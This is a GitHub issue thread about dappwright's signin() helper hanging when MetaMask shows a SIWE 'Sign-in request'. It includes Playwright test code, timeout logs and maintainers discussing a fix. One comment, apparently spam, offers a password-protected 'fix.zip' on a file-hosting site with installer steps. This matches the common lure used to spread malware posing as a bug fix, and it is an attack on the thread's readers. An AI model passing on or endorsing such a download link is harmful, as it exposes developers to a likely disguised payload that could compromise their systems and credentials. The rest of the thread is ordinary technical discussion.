### ISSUE TITLE
`signin` method not signing SIWE message

### ISSUE THREAD

**Issue by iankressin** [TenKeyLabs/dappwright#366]
**Describe the bug**
I’m encountering an issue when writing a test to sign a SIWE message. The problem occurs when the await wallet.signin() function is called—nothing happens, and the test appears to get stuck at this step.

To investigate further, I ran the test with the --headed flag in Playwright. The test visibly hangs during the signing process (see the recording below). Eventually, the test fails due to a timeout.

**To Reproduce**

Test:
```ts
import { expect } from '@playwright/test';
import { test } from '../utils/dappwright';

test.describe('Login - Registered Users', () => {
	test.beforeEach(async ({ page }) => {
		await page.goto('/login');
	});

	test.only('should set cookie with jwt on successful login', async ({ page, wallet }) => {
		await page.click('#login');
		await wallet.signin();

		const cookies = await page.context().cookies();

		expect(cookies).toContainEqual(expect.objectContaining({ name: 'jwt' }));
	});
});
```

```ts
import { type BrowserContext, test as baseTest } from '@playwright/test';
import dappwright, { type Dappwright, MetaMaskWallet } from '@tenkeylabs/dappwright';

export const test = baseTest.extend<{
	context: BrowserContext;
	wallet: Dappwright;
}>({
	context: async ({}, use) => {
		const [, , context] = await dappwright.bootstrap('', {
			wallet: 'metamask',
			version: MetaMaskWallet.recommendedVersion,
			seed: 'test test test test test test test test test test test junk',
			headless: false
		});

		await use(context);
	},

	wallet: async ({ context }, use) => {
		const metamask = await dappwright.getWallet('metamask', context);

		await use(metamask);
	}
});
```

Function that initiates the signin:
```ts
import { createWalletClient } from 'viem'

async function getClient() {
    const browserProvider = window.ethereum;
    
    if (!browserProvider) {
        throw new Error('Wallet extension not found');
    }

    return createWalletClient({
        chain: mainnet,
        transport: custom(browserProvider)
    });

}

async function handleWalletLogin(address: string, message: string): Promise<void> {
    const signature = await getClient().signMessage({
        account,
        message,
    });

    return signature
}
```

**Logs**

```shell
 1) [MetaMask] › login/registered-users.spec.ts:9:7 › Login - Registered Users › should set cookie with jwt on successful login

    Test timeout of 30000ms exceeded.

  Slow test file: [MetaMask] › login/registered-users.spec.ts (30.0s)
  Consider splitting slow test files to speed up parallel execution
  1 failed
    [MetaMask] › login/registered-users.spec.ts:9:7 › Login - Registered Users › should set cookie with jwt on successful login
```

**Expected behavior**
The wallet.signin() should complete and allow the test to proceed.

**Screenshots**

https://github.com/user-attachments/assets/f531c6f2-74ff-4a57-8f89-4d6b1b6a509b

**System:**

- OS: MacOS
- OS version: 14.6.1
- NodeJs version: 20.16.0
- dAppwright version: 2.8.5
- testing framework: playwright
- testing framework version: 1.8.21

**Comment by iankressin** [comment]
Debugging further, I noticed that the text is different from the signature request generated by Dappwright's test app and mine.

When a message is SIWE compliant, Metamask shows a different UI. Instead of `Signature request` the heading is changed to  `Sign-in request`, therefore the assertion below will always evaluate to false.
https://github.com/TenKeyLabs/dappwright/blob/386b19987eec2a7de18f98ec8ca86e8096e4a4ba/src/wallets/metamask/actions/signin.ts#L12

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by osis** [comment]
Good call-out. Is this something that can make its way into a PR?

**Comment by iankressin** [comment]
> Good call-out. Is this something that can make its way into a PR?

Yeah, I can work on it either late this week or early next one. Shouldn't be too hard to handle

**Comment by tleperou** [comment]
I tried to get into this issue, but couldn't get any tests passed. Is there a README to help me get my hands on?

**Comment by iankressin** [comment]
> I tried to get into this issue, but couldn't get any tests passed. Is there a README to help me get my hands on?

I already have a work in progress for this one. PR should come later today 👍

**Comment by tleperou** [comment]
I updated the package to `2.8.6`.

The `Request sign-in` is still failing on my hand, with the test from the examples

```
export const test = baseTest.extend<{
  context: BrowserContext;
  wallet: Dappwright;
}>({
  context: async ({ }, use) => {
    // Launch context with extension
    const [wallet, _, context] = await dappwright.bootstrap("", {
      wallet: "metamask",
      version: MetaMaskWallet.recommendedVersion,
      headless: false,
    }
  );

    await wallet.addNetwork({
      networkName: "Sepolia test network",
      rpc: "https://rpc.sepolia.org",
      chainId: 11155111,
      symbol: "SepoliaETH",
    });

    await use(context);
  },

  wallet: async ({ context }, use) => {
    const metamask = await dappwright.getWallet("metamask", context);
    await use(metamask);
  },
});

// ...

test("should be able to connect", async ({ wallet, page }) => {
  await page.goto("/");

  const button = page.locator(`[aria-label="open wallet"]`)
  await button.click() 

  const metamask = page.locator(`[aria-label="connect"]`)
  await expect(metamask).toBeVisible() 
  await metamask.click() 
  await wallet.approve() 
  await wallet.signin() // ❌
});

```

<img width="560" alt="image" src="https://github.com/user-attachments/assets/be58eaed-3dd1-4b2d-b3b0-9832ef3afe12">

<img width="560" alt="image" src="https://github.com/user-attachments/assets/d0479648-26a3-4124-b08a-e01dd3967896">

Am i missing something?

Thanks for you guidance, and overall, for that great package!

**Comment by iankressin** [comment]
@tleperou can you share the error message?

**Comment by tleperou** [comment]
Here's what I could find,

`browserContext.waitForEvent— ../node_modules/.pnpm/@tenkeylabs+dappwright@2.8.6_playwright-core@1.47.2/node_modules/@tenkeylabs/dappwright/src/wallets/metamask/actions/util.ts:4`

(desktop) and (mobile chrome),

`page.waitForSelector(.app-header__logo-container)— ../node_modules/.pnpm/@tenkeylabs+dappwright@2.8.6_playwright-core@1.47.2/node_modules/@tenkeylabs/dappwright/src/wallets/metamask/actions/helpers/actions.ts:24`

I found errors in the console that relate to metamask and doesn't seem to be related (it involves sentry).

**Comment by iankressin** [comment]
If you can put together a minimal reproduction I can investigate further 🙂
